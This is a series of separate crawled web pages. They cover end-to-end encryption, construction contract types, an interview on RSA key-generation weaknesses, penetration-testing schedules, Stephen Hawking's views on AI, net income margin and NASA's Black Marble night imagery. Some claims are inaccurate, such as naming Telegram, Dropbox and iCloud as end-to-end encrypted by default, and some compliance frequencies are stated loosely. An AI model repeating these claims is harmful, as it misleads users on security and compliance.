cyber-attacks. Because the messages are encrypted at the device level, even if a hacker gains access to the server or network, they will not be able to read the contents of the messages. Finally, end-to-end encryption can also help to protect against censorship and surveillance by governments or other entities. By encrypting the messages, users can ensure that their communications are private and not subject to interception or monitoring by third parties. While end-to-end encryption has numerous advantages, there are also several potential disadvantages that should be considered. One disadvantage is that end-to-end encryption can make it more difficult for law enforcement and other authorities to access communications that may be relevant to criminal investigations or national security concerns. This can create tensions between privacy advocates and law enforcement agencies. Another potential disadvantage is that end-to-end encryption can make it easier for criminals and other malicious actors to communicate without fear of detection or interception. This can enable criminal activity such as terrorism, drug trafficking, and cybercrime, making it harder for law enforcement to track and apprehend suspects. 
Lastly, end-to-end encryption can also pose challenges for companies and service providers that are required to comply with data retention and disclosure laws. Because the messages are encrypted and inaccessible to anyone except the sender and recipient, service providers may not be able to comply with legal requirements to retain and disclose certain types of communications. Many popular applications and services have adopted E2EE as a standard security measure, including messaging apps like WhatsApp, Signal, and Telegram. These apps use E2EE to ensure that messages and calls are secure and cannot be intercepted by third parties. Other applications that use E2EE include file sharing services like Dropbox and cloud storage services like iCloud. By encrypting data in transit and at rest, these applications protect user data from unauthorized access and cyber attacks. E2EE has become an essential component of modern digital communication, and its widespread adoption is a testament to the importance of data privacy and security in our digital world. End-to-end encryption (E2EE) and encryption in transit are two different approaches to securing data during transmission. Encryption in transit is the process of encrypting data as it moves from one point to another, such as between a user’s device and a server. This kind of encryption protects data from interception by third parties during transmission, for example, the Transport Layer Security (TLS) encryption protocol. E2EE, on the other hand, encrypts data at the source and decrypts it only at the destination, ensuring that the data is protected from unauthorized access during transmission and at rest. While encryption in transit provides a basic level of security, E2EE provides a higher level of protection, ensuring that only the intended recipient can read the messages. Both approaches are important for securing data in transit, and the choice of which to use will depend on the specific needs and requirements of each application or service. End-to-end encryption (E2EE) is important because it ensures that data is kept secure and private during transmission and at rest. By encrypting data at the source and decrypting it only at the destination, E2EE ensures that only the intended recipient can read the messages, preventing unauthorized access or interception by third parties. E2EE is particularly important in today’s digital world, where data breaches and cyber attacks are increasingly common. By using E2EE, users can ensure that their sensitive information, such as financial data, medical records, or personal messages, is kept confidential and secure. Moreover, E2EE can help protect against government surveillance and censorship, ensuring that individuals can communicate freely without fear of interception or monitoring by third parties. In countries with repressive governments, E2EE can provide a lifeline for dissidents, journalists, and other activists who rely on secure communication to carry out their work. Finally, E2EE can also help to build trust between users and service providers by demonstrating a commitment to data privacy and security. By adopting E2EE as a standard security measure, companies and service providers can signal their dedication to protecting user data and preventing unauthorized access or interception. End-to-end encryption (E2EE) supports privacy by ensuring that only the intended recipient can read the messages, preventing unauthorized access or interception by third parties. 
With E2EE, messages are encrypted at the source and decrypted only at the destination, which means that intermediaries, such as service providers or governments, cannot access the content of the messages. This protects user privacy and prevents sensitive information, such as financial data or personal messages, from being exposed. E2EE also enables individuals to communicate freely and privately without fear of government surveillance or censorship. By providing a higher level of security and privacy for digital communication, E2EE helps to safeguard individual privacy rights in an increasingly digital world. End-to-end encryption (E2EE) backdoors refer to intentional vulnerabilities or weaknesses in E2EE systems that allow third parties to access encrypted data. While backdoors may be designed with good intentions, such as to enable law enforcement agencies to access communications in cases of national security, they pose a significant threat to user privacy and security. Backdoors can be introduced in different ways, such as by designing weak encryption algorithms, storing encryption keys in central databases, or requiring service providers to provide access to encrypted data upon request. However, regardless of how they are implemented, backdoors create a vulnerability that can be exploited by hackers, criminals, or authoritarian governments. Moreover, backdoors undermine the very purpose of E2EE, which is to provide a higher level of security and privacy for digital communication. By introducing backdoors, E2EE systems become no different from traditional encryption systems, which are susceptible to interception or unauthorized access. Backdoors have become a contentious issue in the tech industry, with many companies and service providers opposing them on the grounds of user privacy and security. However, some governments argue that backdoors are necessary to combat terrorism, child exploitation, or other criminal activities. End-to-end encryption backdoors are intentional vulnerabilities or weaknesses in E2EE systems that allow third parties to access encrypted data. While they may be designed with good intentions, they pose a significant threat to user privacy and security, and undermine the purpose of E2EE. As the debate over backdoors continues, it remains to be seen whether governments and tech companies can find a compromise that balances national security and user privacy. End-to-end encryption (E2EE) is an important tool for protecting data online. With E2EE, data is encrypted on a user’s device and can only be decrypted by the intended message recipient, ensuring that it is kept private and secure. While E2EE has some limitations and risks, it is still an essential tool for anyone who wants to protect their data. As more and more applications and services adopt E2EE, it’s easier than ever to communicate and share information securely. Helenix could help you implement E2EE in your digital environment. Learn more about our competencies at the Custom Development section. End-to-end encryption is used in messaging services, email services, and cloud storage. The most popular examples of end-to-end encryption is the messaging app, Signal. Signal is a secure E2EE messaging app that offers end-to-end encryption for all messages sent through the app. E2EE ensures that only the intended recipient can read the encrypted message. This is important for sensitive or confidential communications, such as those related to business, finance, or personal matters. 
End-to-end encryption also provides an added layer of security against hackers and cybercriminals, who may try to intercept or eavesdrop on communications. End-to-end encryption can be hacked in a number of ways, including by exploiting vulnerabilities in the encryption protocol, by using social engineering tactics to gain access to encryption keys, or by intercepting messages before they are encrypted. End-to-end encryption on a phone refers to the use of encryption protocols to secure communications sent and received on a mobile device. This can include messages, emails, phone calls, and other types of communications.
<urn:uuid:cbc9adf5-7866-451d-b0f6-c7a748dc7952>
CC-MAIN-2024-38
https://helenix.com/blog/end-to-end-encryption-ee2e/
2024-09-13T05:57:17Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00676.warc.gz
en
0.942366
2,759
3.65625
4
Guide to Understanding Construction Contract Types Construction projects are complex endeavors that require careful planning, management and execution. At the heart of every construction project lies the contractual agreement that defines the scope, responsibilities and financial arrangements. Understanding different types of construction contracts is crucial for all stakeholders involved, including project owners, construction contractors and project managers. In this article, we will delve into the common types of construction contracts, their advantages, disadvantages and scenarios in which they are most suitable. What are Construction Contracts? Construction contracts are legally binding agreements that outline the terms, conditions, responsibilities and obligations between parties involved in a construction project. These contracts establish the framework for how a construction project will be planned, executed and completed. They are crucial for providing clarity and legal protection for all parties, including owners, contractors, subcontractors, architects, engineers and suppliers. Common Elements of Construction Contracts Common elements of construction contracts include: - Parties involved: This section identifies the parties entering into the contract, such as the owner (client), contractor, subcontractors, architects, engineers and any other relevant stakeholders. - Scope of work: This outlines the specific tasks, responsibilities and deliverables associated with the project. It details the work to be completed, materials to be used and quality standards to be met. - Project timeline: The contract specifies the start and completion dates of the project, including any milestones or critical dates that need to be met. - Budget and payment terms: This section outlines the financial aspects of the contract, including the total project cost, payment schedule and any provisions for change orders or additional costs. - Contract price and payment terms: The contract should clearly state the agreed-upon price for the project, as well as the payment schedule, which may be based on specific milestones or stages of completion. - Contractual documents: These include any plans, specifications, drawings or other documents that are incorporated into the contract by reference. These documents provide a detailed description of the project requirements. - Insurance and liability: The contract may specify the types and amounts of insurance coverage required by each party, as well as the allocation of liability in case of accidents, damages or delays. - Change orders: This section outlines the process for making changes to the original scope of work, including how additional costs or time extensions will be handled. - Dispute resolution: Contracts often include clauses outlining procedures for resolving disputes, such as mediation, arbitration or litigation. - Termination and default: This section defines the conditions under which the contract can be terminated, as well as the consequences of defaulting on the contract terms. - Warranties and guarantees: The contract may specify any warranties or guarantees provided by the contractor for the completed work. - Regulatory compliance: The contract should include provisions ensuring that all work will be performed in compliance with local, state and federal laws, codes and regulations. 
Different Types of Construction Contracts Construction contracts provide distinct frameworks for managing responsibilities, costs and risks among the project owner and stakeholders. The type of project typically helps decide which contract to use. Let's dive into the common construction contract types. Lump Sum Contract Lump Sum construction contracts, or Fixed-price contracts, establish a predetermined price for the entire project. This type of contract provides a clear-cut budget from the outset and is one of the most common types of contracts to use. There is a wide range of projects that use lump sum contracts, including residential construction and commercial buildings. Advantages of Lump Sum Contracts - Cost predictability for the client: The client knows the exact cost of the project upfront, which helps with financial planning. - Reduced financial risk for the client: With the exception of change orders, any unforeseen expenses or cost overruns are the contractor's responsibility. Disadvantages of Lump Sum Contracts - Limited flexibility for changes: Since the contract specifies a fixed price for the entire project, any deviations will have to be updated through change orders. - Potential for disputes over scope changes: Disagreements can arise if changes to the original scope are not clearly defined, requiring change orders. Unit Price Contract Unit Price contracts establish fixed rates for specific units of work, such as per square foot or per unit. This type of contract is commonly used for repetitive or standardized work, such as utility installations and Department of Transportation (DOT) work. Advantages of Unit Price Contracts - Suitable for repetitive or standardized work: Provides a standardized pricing model. - Clear pricing for specific units of work: Simplifies cost calculations. Disadvantage of Unit Price Contracts - Potential disputes for the amount of work completed: Owner/client may not want to pay you for the total work completed to date. Cost-plus contracts allow for more flexibility in terms of changes to the project scope. In this type of contract, the client covers the actual construction costs (time and materials contracts) plus an agreed-upon fee/markup for the contractor's services. Common projects that use this type of contract include renovation projects and projects with evolving scope. Advantages of Cost-Plus Contracts - Flexibility for changes and unforeseen circumstances: Well-suited for projects with evolving scopes or uncertain conditions. - Greater transparency in project costs: Clients have insight into all project expenses. Disadvantages of Cost-Plus Contracts - Potential for higher overall project cost: If the project scope expands, the client bears the additional costs. - Requires trust in the contractor: Reliance on the contractor's honesty and integrity regarding cost reporting. Guaranteed Maximum Price (GMP) Contract A GMP contract (Cost Plus Not to Exceed) is a type of construction contract where the contractor agrees to complete a project within a specified budget, which is the maximum price. These projects typically have a well-defined scope and do not have unexpected costs. If the actual costs of construction are lower than the maximum price, the savings may be shared between the owner and the contractor. A Guaranteed Maximum Price contract is typically used when the owner has a strict budget, if the funding is limited or any cost overruns could jeopardize the project. 
Advantages of a GMP Contract - Provides cost predictability and safeguards for the owner. - Encourages contractors to control costs and manage efficiently. - Allows for cost savings to be shared between the owner and contractor if the project comes in under budget. Disadvantage of a GMP Contract - Potential disputes if unforeseen circumstances arise requiring a change in scope and the not-to-exceed price. Design-build contracts combine both the design and construction phases under a single contract. This approach promotes efficiency and collaboration. Common projects that use this type of contract include infrastructure projects, large-scale developments and higher education schools/campuses. Advantages of Design-Build Contracts - Single point of responsibility for both design and construction: Streamlines communication and accountability. - Faster project delivery: Eliminates potential delays associated with separate design and construction phases. Disadvantages of Design-Build Contracts - Limited control for the client in the design phase: Clients may have less influence over design decisions. - Potential for conflicts between design and construction teams: Requires strong project management and coordination. HOW DELTEK SUPPORTS THE CONSTRUCTION INDUSTRY Deltek ComputerEase is the leading construction software provider of job costing accounting, project management, and payroll services—delivering solutions that help customers connect and automate the project lifecycle that fuels their business. Deltek ComputerEase’s specialized work in progress reporting helps contractors track progress on every job. If you are currently using a generic accounting solution that’s built for standard accounting processes, you will undoubtedly benefit from switching to Deltek ComputerEase, a dedicated construction accounting solution that includes WIP reporting. Contact us today to learn how Deltek ComputerEase can help you to boost your profitability.
<urn:uuid:266ee337-aa63-4b91-b618-faf8ffe01267>
CC-MAIN-2024-38
https://www.deltek.com/en/construction/contract-types
2024-09-13T05:15:56Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00676.warc.gz
en
0.922204
1,627
2.71875
3
Putting to Rest RSA Key Security Worries

Impact on Online Transactions Seen as Minimal

A recently published research paper that raised questions about the efficacy of RSA public-private key cryptography shouldn't be too concerning for IT security practitioners, says Eugene Spafford of Purdue University. And although the research has since been disputed, Spafford explains why there's still value in such a discussion.

The research paper, entitled "Ron was Wrong, Whit was Right," concludes that the way the RSA algorithm generates random numbers to be used in encryption keys could, in rare instances, make a secret number public. And that could create a potential vulnerability that hackers might exploit, the researchers say.

Spafford says the exposed keys aren't the type that would be used by businesses such as financial institutions that conduct sensitive transactions on the Internet. What apparently happened is that some smaller organizations created their own Secure Socket Layer public-private key sets using software to generate random numbers, Spafford says. The smaller organizations may have used a small set of seed values that would generate the same set of large prime numbers.

So what lessons can be learned from this? According to Spafford, one of the problems with encryption is "the whole aspect of key generation and management, and that has been the case for a very long time." He argues that although security practitioners can develop and use algorithms that are effectively unbreakable, if they're unable to generate truly random keys and keep them safe from prying eyes, "then it doesn't matter how strong the algorithms really are."

"There have been a number of systems that, going back in time, the generation of a key ... didn't use enough randomness and resulted in keys that were more trivially broken," Spafford says in an interview with Information Security Media Group's Eric Chabrow [transcript below].

Spafford says this kind of scrutiny and review of security systems is a necessary element in ensuring their validity. "It's important that we regularly verify our assumptions, verify that the systems we're using really work the way that they're supposed to work," he says.

In the interview, Spafford:

- Summarizes the problem raised in the research paper;
- Evaluates the response by RSA Chief Technologist Sam Curry to the paper;
- Explains why such research into possible flaws of encryption and cryptographic solutions, even when disputed, is valuable.

Spafford also serves as executive director of the Purdue Center for Education and Research in Information Assurance and Security. Widely considered a leading expert in information security, Spafford has served on the Purdue computer science faculty since 1987. His research focuses on information security, computer crime investigation and information ethics.

RSA Public-Key Security Issue

ERIC CHABROW: Please take a few moments to summarize what you see as the problem the researchers raise in the paper entitled, "Ron was Wrong, Whit was Right," and the response by RSA Chief Technologist Sam Curry to the paper.

EUGENE SPAFFORD: What the researchers found is that by collecting a very large number of existing public keys and doing some analysis, they were able to find common factors that were used in generating those keys. This is a weakness that can be exploited because if one can find those factors, it's possible to find the private keys associated with them.
The conclusion that they make in the paper is that this is a fundamental weakness in using the RSA algorithm, but in reality what it demonstrates is that there are weaknesses if a random number generation mechanism that's used to generate the keys isn't really truly random. It's not so much a flaw with RSA as it is with the implementation that has been used to generate many of the keys. CHABROW: That sort of supports what RSA Chief Technologist Sam Curry said, that it's more of a process than it is actually the number generation itself? SPAFFORD: I would say that's a reasonably accurate characterization. Issues for Large Organizations CHABROW: Okay, so I'm a CSO at a bank or a hospital or a government agency and our organization uses the RSA public-key cryptography. What should I do? SPAFFORD: The follow-up that I've seen posted online and related to the paper indicates that the keys where they found difficulties were in self-signed, locally generated SSL keys or encryption keys, not the kind of keys that would likely be used at a financial institution. What appears to be the case is that some organizations generated their own SSL public-private key sets using software that had poor random number generators, may have repeatedly started from a small set of seed values and, as a result, occasionally would regenerate the same set of large prime numbers. These keys being somewhat of a problem of course are not likely used in major commercial transactions. Those keys tend to be generated using a much better random number generation system, possibly even hardware generation, and didn't appear to be among the sets of keys that were found to be vulnerable. CHABROW: What would be some of the situations an organization would use these keys that the researchers pointed out could have a flaw? SPAFFORD: This might be at an educational institution or somebody's home where they set up a web server with an SSL certificate using RSA. It could also be where somebody has generated a PGP key for themselves, again from one of these home systems with a poor generator then installed that public-key in one of the directories. There are a couple of different places where the keys could come from. At least the sources that I have been looking at, some of the analyses that have been online indicate that really high-security keys, ones that are very important to large enterprises, were not among the ones that were found to have deficient keys. CHABROW: And you're not aware of any organizations, high-end organizations, that would use the ones that were described in the paper? SPAFFORD: That's correct. Value in RSA Key Security Debate CHABROW: Is this much to do about nothing or is there some worthy discussion here? SPAFFORD: Oh, I think there are some worthy things to get out of this. One of the big problems with encryption is the whole aspect of key generation and management, and that has been the case for a very long time. We're able to develop and use algorithms that are effectively unbreakable given current technology, but unless we're able to generate truly random keys and keep them appropriately safe from prying eyes, then it doesn't matter how strong the algorithms really are. This is an example of a problem with generating a good key and having enough randomness to generate a key that can't be easily broken or doesn't possibly provide some benefit to an attacker, and we've seen this kind of problem before. 
There have been a number of systems that, going back in time, the generation of a key didn't use enough entropy, didn't use enough randomness and resulted in keys that were more trivially broken. I myself, with a couple of my students, found a problem with the Kerberos 4 key generation scheme about 15 years ago. That was really very similar to this same idea. CHABROW: Does this research suggest that even tried and true IT security practices must be questioned and tested periodically? Even RSA's response says although it didn't agree with the conclusions, and they sort of agreed with what you said, they liked the idea that people are spending time looking into things like this. SPAFFORD: I think it's very important. It's very easy to make assumptions about how the underlying technology works or is supposed to work. We've seen time and time again where those assumptions are incorrect possibly because whoever it was developing the code misunderstood or didn't understand these issues, and so it's important that we regularly verify our assumptions, verify that the systems we're using really work the way that they're supposed to work. Furthermore, to understand that over time because this is still a developing field, our technology gets better, our computers get faster ... and we understand some issues of algorithms better. So assumptions that were made in the past may not hold true in a future environment. That's another reason to go back and test things.
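The shared-factor weakness Spafford describes at the top of the interview, collecting public keys and finding common factors, can be illustrated with a few lines of arithmetic. The sketch below is an editorial illustration using deliberately tiny primes; real RSA moduli are hundreds of digits long, and the researchers ran pairwise GCDs across millions of collected keys. It is not code from the paper or the interview.

```python
# Toy illustration of the shared-factor weakness discussed above.
# If two RSA moduli were generated with overlapping randomness and share a
# prime, a simple GCD recovers that prime without any factoring.
from math import gcd

e = 65537            # common public exponent

p_shared = 61        # tiny primes for illustration only; real ones are ~1024 bits
q1, q2 = 53, 59

n1 = p_shared * q1   # modulus of key 1
n2 = p_shared * q2   # modulus of key 2 (bad RNG reused the same prime)

p = gcd(n1, n2)      # instantly reveals the shared prime: 61
q = n1 // p

# With the factorization known, the private exponent of key 1 follows directly.
phi = (p - 1) * (q - 1)
d = pow(e, -1, phi)  # modular inverse (Python 3.8+)
print(f"shared prime: {p}, recovered private exponent for key 1: {d}")
```

The point Spafford makes holds here: the algorithm itself is sound, but if the random number generator behind key generation repeats itself, the resulting keys can betray each other.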
<urn:uuid:5ef0965b-17e7-4ec6-898a-63d630459f89>
CC-MAIN-2024-38
https://www.healthcareinfosecurity.com/interviews/putting-to-rest-rsa-key-security-worries-i-1395
2024-09-13T04:15:43Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00676.warc.gz
en
0.976967
1,705
2.765625
3
What Is the Purpose of Penetration Testing?

Rather than merely assessing potential vulnerabilities in your IT system, a penetration test acts as a simulated cyber attack to determine how your system handles one. Trained IT professionals try to gain access to your system using a variety of methods that help identify vulnerabilities and show how those vulnerabilities can be exploited. In this way, it points toward solutions that reduce the risk of a real cyber attack in the future. As an ethical hack, it is designed to provide a cyber attack test without harmful consequences. Instead, this test provides real-world data and insight into which areas are most vulnerable and how those specific areas could be used to damage your system.

The main purpose of testing is to look at your operations through the eyes of an attacker and proactively prevent those attacks. Through this process, companies discover specific weaknesses in their IT systems at the time of testing. Using this understanding allows for proactive mitigation and correction of these potential avenues of abuse. Businesses should strive to protect their digital infrastructure using the information obtained through these tests. The main goal of testing is to have trained professionals probe for vulnerabilities. While a secure IT network is a major advantage, other benefits offered by pen testers range from building customer trust to a healthy PR profile. With that in mind, let's dive in and take a closer look at the purpose of testing, and examine the different value propositions that the test leads to.

Regulatory Frameworks that Require Penetration Testing

Due to the highly regulated nature of some industries, such as service providers, healthcare and banks, penetration testing is necessary to ensure compliance. Here are some common rules that require penetration testing for compliance:

Penetration testing is required for the initial SOC 2 Type II audit and every 180 days thereafter. SOC stands for Service Organization Control, and SOC 2 compliance is an industry standard for technology service organizations. In order to comply with SOC 2, companies must conduct a cyber security audit. This audit examines five controls known as the trust services principles: security, availability, processing integrity, confidentiality, and privacy. Auditors ensure that these five controls are relevant to the sector. Cybersecurity experts recommend penetration testing quarterly or twice a year as part of the SOC 2 compliance audit.

Penetration testing is required at least once a year. Medical information is extremely valuable and perhaps more lucrative for hackers than credit card information. It usually includes personal identification numbers, birth dates, insurance numbers, diagnostic codes, and billing information. Hackers can use this information to commit identity fraud and to file fraudulent claims. It is necessary that medical institutions conduct regular pen tests to ensure that the data is safe from prying eyes. HIPAA (the Health Insurance Portability and Accountability Act of 1996) is a U.S. federal law that regulates the privacy, security, and electronic exchange of medical information. Under HIPAA, healthcare institutions must conduct regular technical security testing of their data. Is there a better way to test the system than to think like the person trying to break it? That's what a pen tester does.

A penetration test by an independent testing organization is required every 180 days. It does not have to be performed by an ASV or QSA.
PCI DSS stands for Payment Card Industry Data Security Standard. It is a standard that governs the way users' card data is managed. It has recently been updated to require vulnerability scanning and pen testing. Vulnerability assessment and penetration testing must cover the perimeter of the cardholder data environment (CDE) and any systems that could affect the security of the CDE in the event of a threat. Pen tests should be performed at least once a year, and every six months for service providers.

When to Perform a Pen Test

First, the organization must understand that the penetration test is not a one-time activity. The cyber threat environment is constantly changing. New vulnerabilities are constantly emerging, and for every cybercriminal who hangs up his shoes (you can always hope!), three more jump in. That is why it is important to set recurring checkpoints that will guide the organization's pen testing strategy. Therefore, pen tests should be performed whenever the following situations occur:

- New components or applications are added to the IT infrastructure
- Significant changes or updates are made to the infrastructure, even if no other components have been added
- Security patches are applied to antivirus software or firewalls
- Company acquisitions and mergers take place (testing should be completed before the acquisition or merger)

Almost all organizations experience such situations during their business, so pen tests are key to maintaining a strong security posture.

5 Signs That It's Time for Penetration Testing

- After Launch – IT teams often work with impossible deadlines and are forced to release applications, systems, or services without a proper security assessment. When systems are new, they usually have security holes and vulnerabilities that penetration tests can detect.
- After Significant Changes Are Made to the Environment – Major changes in the IT infrastructure create vulnerabilities that automated scanners can miss. Through security penetration testing, organizations can identify any security breaches, misconfigurations, or logical errors that may result from such major changes. Organizations typically continue to make rapid changes to their systems, infrastructure, and technology to stay agile and keep up with ever-changing technologies. These rapid changes inadvertently create gaps and weaknesses in the IT infrastructure that can be exploited. Last year, moreover, a global pandemic swept over organizations and forced them into digital transformation in full swing.
- After Security Patches Are Applied – Security patches are fixes for previously released software designed to fix bugs, vulnerabilities, and security holes. Because patch information is publicly available, attackers are quick to read it and look for ways to break the patches and exploit the related vulnerabilities. While many organizations are slow to apply patches, it is not uncommon for attackers to take advantage of already-fixed vulnerabilities. It is therefore not recommended to blindly apply security patches to all devices as they appear, regardless of their impact, nor is it recommended to ignore security patches entirely.
- After a Policy Is Modified – The security policies covering the company, end users and information affect the security posture of the organization. The principles of information security form the core of functional security and define the scope and activities of the organization's security management system.
Major changes in security policies affect the IT environment and therefore call for extensive security penetration testing. Such tests provide insight into the newly defined information security controls. Changes to company and end-user policies can create vulnerabilities and logical errors that cannot be detected by scanning tools and simple vulnerability assessments. Pen tests are crucial in catching such misconfigurations and logical errors.

- If Your Industry Is Regularly Targeted – If you've received warnings about sophisticated cyberattacks targeting your industry, it's time to get involved in security penetration testing. This could be due to technological or regulatory changes in the industry or other factors causing an increase in the attack surface.

Ensure you are fully prepared for a penetration test by reviewing our comprehensive penetration testing questionnaire.

How Often Should Pen Testing Be Done?

Penetration testing should be conducted regularly (at least once a year) to ensure more consistent IT and network security management and to reveal how malicious hackers could exploit recently discovered threats (zero-days, one-days) or emerging vulnerabilities. In addition to the regularly scheduled inspections and evaluations required by regulations such as GDPR and PCI DSS, testing must also be conducted whenever:

- A new infrastructure or network application has been added
- Significant updates or changes are applied to the infrastructure or applications
- New offices are being set up
- Security patches have been applied
- End-user policy changes

Is It Time for Your Organization to Get Tested?

I.S. Partners can perform penetration testing that simulates an actual attack by a hacker. Request a quote today to get started.
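As a rough, editorial illustration of the cadences mentioned above (annual for most organizations, every 180 days under SOC 2, every six months for PCI DSS service providers), the short sketch below computes when the next test falls due from the date of the last one. The cadence values are assumptions drawn from the text, not authoritative compliance rules, and the dates are hypothetical.

```python
# Rough scheduling helper for the pen-test cadences discussed above.
# The cadences are illustrative defaults, not authoritative compliance rules.
from datetime import date, timedelta

CADENCE_DAYS = {
    "general-annual": 365,          # "at least once a year"
    "soc2": 180,                    # "every 180 days thereafter"
    "pci-service-provider": 182,    # "every six months for service providers"
}

def next_pen_test_due(last_test: date, regime: str) -> date:
    """Return the date by which the next penetration test should occur."""
    return last_test + timedelta(days=CADENCE_DAYS[regime])

last_test = date(2024, 1, 15)  # hypothetical date of the last engagement
for regime in CADENCE_DAYS:
    print(regime, "->", next_pen_test_due(last_test, regime).isoformat())
```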
<urn:uuid:d52c3248-2bb0-446d-ba5e-18b46c3c4690>
CC-MAIN-2024-38
https://www.ispartnersllc.com/blog/penetation-testing-frequency/
2024-09-13T04:26:22Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00676.warc.gz
en
0.936608
1,595
2.9375
3
Stephen Hawking believes AI could be mankind's last accomplishment

According to Stephen Hawking, artificial intelligence (AI) and its possible implementations need to be managed with the utmost care in order to prevent its power from falling into the wrong hands or being used in a way that does not benefit mankind as a whole. The renowned physicist stressed that AI could be used to commit deplorable acts in the form of powerful autonomous weapons, and that people in power could use the technology to oppress and control a majority of the population. Hawking even went so far as to suggest that the creation of AI could potentially end up being the last accomplishment of mankind if we do not learn to understand the risks associated with it. However, he also believes that the technology could be extremely beneficial to the world and could be used to stop the spread of disease and poverty.

On Wednesday, at the opening of the new Leverhulme Centre for the Future of Intelligence (LCFI) at Cambridge University, Hawking offered further insight into his thoughts regarding both the positive and negative implications of creating a true AI, saying: "We spend a great deal of time studying history, which, let's face it, is mostly the history of stupidity. So it's a welcome change that people are studying instead the future of intelligence".

"The potential benefits of creating intelligence are huge... With the tools of this new technological revolution, we will be able to undo some of the damage done to the natural world by the last one -- industrialization. And surely we will aim to fully eradicate disease and poverty. Every aspect of our lives will be transformed. In short, success in creating AI, could be the biggest event in the history of our civilization. But it could also be the last, unless we learn how to avoid the risks. Alongside the benefits, AI will also bring dangers, like powerful autonomous weapons, or new ways for the few to oppress the many. It will bring great disruption to our economy", adds Hawking.

Hawking concluded his speech with the notion that "AI will be either the best, or the worst thing ever to happen to humanity. We do not yet know which".

Hawking has previously criticized AI, but now, as we approach its potential reality, he has become more receptive to the technology and the advances it could bring.

Published under license from ITProPortal.com, a Future plc Publication. All rights reserved.
<urn:uuid:40ee4901-6d78-4a83-987b-cca1adb4815f>
CC-MAIN-2024-38
https://betanews.com/2016/10/21/artificial-intelligence-stephen-hawking/
2024-09-14T11:38:10Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651579.22/warc/CC-MAIN-20240914093425-20240914123425-00576.warc.gz
en
0.966036
492
2.5625
3
Net Income Margin (also referred to as return on sales or net profit margin) measures how much profit a company makes for each dollar in revenue. While the net profit figure gives us the actual amount of money earned, the net income margin gives us a percentage. This in turn provides a measure we can use to compare companies or business units. Net income margin is an important indicator of how efficient a company (or business unit) is and how well it is able to control its costs.

Net Income Margin = (Net Income / Revenue) x 100

This indicator is included in the book: Key Performance Indicators – the 75+ measures every manager needs to know, which contains an in-depth description of this KPI, as well as practical advice on data collection, calculations, target setting, and actual usage.
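To make the formula concrete, here is a small worked example; the revenue and net income figures are invented purely for illustration.

```python
# Worked example of the Net Income Margin formula above.
def net_income_margin(net_income: float, revenue: float) -> float:
    """Return net income margin as a percentage of revenue."""
    return (net_income / revenue) * 100

# Hypothetical figures: $2.4M net income on $18M revenue.
margin = net_income_margin(2_400_000, 18_000_000)
print(f"Net income margin: {margin:.1f}%")   # -> 13.3%
```

A higher percentage means the company keeps more of each dollar of revenue as profit, which is what makes the ratio useful for comparing businesses or business units of different sizes.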
<urn:uuid:938a9f43-2738-4207-92f5-2c2740cdfdce>
CC-MAIN-2024-38
https://bernardmarr.com/net-income-margin/?paged1223=4
2024-09-16T23:56:54Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00376.warc.gz
en
0.93883
172
2.859375
3
Studying nighttime images of the Earth taken from satellites could go a long way toward building policymakers' understanding of disasters around the world and how to manage risks. That's according to the UN's latest Global Assessment Report on Disaster Risk Reduction. Eleanor Stokes is a contributing author to the report, who also helps lead the science team for a project called Black Marble, a joint effort by NASA and the Universities Space Research Association (USRA) that captures nighttime data around the globe every single night. Stokes is a senior scientist at USRA's Earth from Space Institute in Columbia, Maryland, and she joined the Federal Drive with Tom Temin to share more.

Jared Serbu: Dr. Stokes, thanks for being here. Let's, if you could, start us off with a little bit of an introduction into what the Global Assessment Report is and tries to do for policymakers around the world. And then we'll talk a little bit more about what Black Marble can do to help inform all those efforts.

Eleanor Stokes: Sure. The Global Assessment Report is a report on disaster risk reduction. It comes out every two years, and it's exploring how systemic risk in the world has changed over time and what the current state of risk is. It's put out by the UN. And it's sort of similar to the IPCC for climate change. But this is focused more on disaster risk.

Jared Serbu: And unless I'm wrong, I think it actually deliberately excludes the effects of climate change, right, and tries to describe risk over and above what climate change might actually be doing in certain areas. Do I have that right?

Eleanor Stokes: Well, they're sort of intermingled, because it talks a lot about disasters and how disasters change because of climate change, their prevalence and their intensity. But it's not just looking at how the physical disasters might change, but how the whole system might be affected. So the socioeconomic systems that are affected by that, or the infrastructures, how we have changed the way we are exposed to those risks. So yeah, it's not just about climate change, though that is certainly one of the risks that it's considering.

Jared Serbu: Got it, okay. So tell us a bit about Black Marble, the kinds of data you collect, and how that might inform efforts that are described in that risk reduction report?

Eleanor Stokes: Sure. Black Marble is a project that NASA has funded. It's a satellite data set that has been imaging the world at night since 2012, on a daily basis. And it's really different from a lot of other satellite datasets, because at night, you can imagine, you've probably seen these images that come up, usually before Hollywood movies, of the world at night. The thing that really pops out is human settlements in that satellite data set. So what we're able to see is things like electricity infrastructure, roads, how populations might be moving or migrating, things like conflicts, electricity reliability, and also how disasters affect all of those things. So it's truly a human satellite, it's focused on us as opposed to on the natural systems that support us and the other species that live on the planet.
The reason Black Marble is so useful to this report is it starts to incorporate these physical models of climate change and climate disasters with the social models of the impacts on humans and on cities. And so when you start to really do some data fusion between the satellite data we’ve had for years from the natural world with the human world, you really start to get a strong understanding of how risk is going to propagate to affect different parts of our economic and social system. Jared Serbu: And I think you’re able to look at both long term and short term effects, right? I mean, things like long term migration patterns, and power outages. I think the report specifically talks about how Black Marble was used in the aftermath of the hurricanes in Puerto Rico. Eleanor Stokes: That’s right. So yeah, I mean, one of the really cool things about satellite data that’s really well known is that we always shoot for a long-term record. So Black Marble has now been collecting data since 2012. It will continue to collect data for at least another decade. And so that’s like a long term record that we can rely on. But in addition, it’s collecting data on a daily basis. So we get to see short term changes, like how disasters might affect power outages. We’ve looked at New Orleans after different hurricanes. We’ve looked at the Texas outage that happened with the winter storm, and at Cyclone Fani. There are a lot of impacts that are hard to understand the distribution of, or study, with just information from the power sector, or from producers of electricity, because that data is often held within one district. So if you have a utility provider, they have a certain boundary that they care about. But the satellite data has no boundary; it works globally, across different utility providers’ domains, and lets us understand these outages at a very high spatial 